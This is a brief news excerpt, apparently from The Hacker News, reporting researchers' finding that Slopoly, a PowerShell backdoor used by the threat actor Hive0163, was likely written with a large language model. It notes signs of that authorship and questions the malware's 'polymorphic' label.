"Although still relatively unspectacular, AI-generated malware such as Slopoly shows how easily threat actors can weaponize AI to develop new malware frameworks in a fraction of the time it used to take. The discovery demonstrates the accelerating threat landscape where artificial intelligence enables rapid malware development."
"There are signs that the malware was developed with the help of an as-yet-undetermined large language model (LLM). This includes the presence of extensive comments, logging, error handling, and accurately named variables. The comments also describe the script as a Polymorphic C2 Persistence Client, indicating that it's part of a command-and-control framework."
"However, the script does not possess any advanced techniques and can hardly be considered polymorphic, since it's unable to modify its own code during execution. The builder may, however, generate new clients with different randomized configuration values and function names, which is standard practice among malware builders."
Cybersecurity researchers discovered Slopoly, an AI-generated malware used by financially motivated threat actor Hive0163. The malware was deployed during post-exploitation phases to maintain persistent access to compromised servers. Slopoly is a PowerShell-based backdoor with command-and-control capabilities, likely created using a large language model based on its extensive comments, logging, and error handling. While not technically polymorphic, the malware builder generates new clients with randomized configurations and function names. Hive0163 operates through data exfiltration and ransomware attacks, utilizing various malicious tools including NodeSnake, Interlock RAT, and JunkFiction loader.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]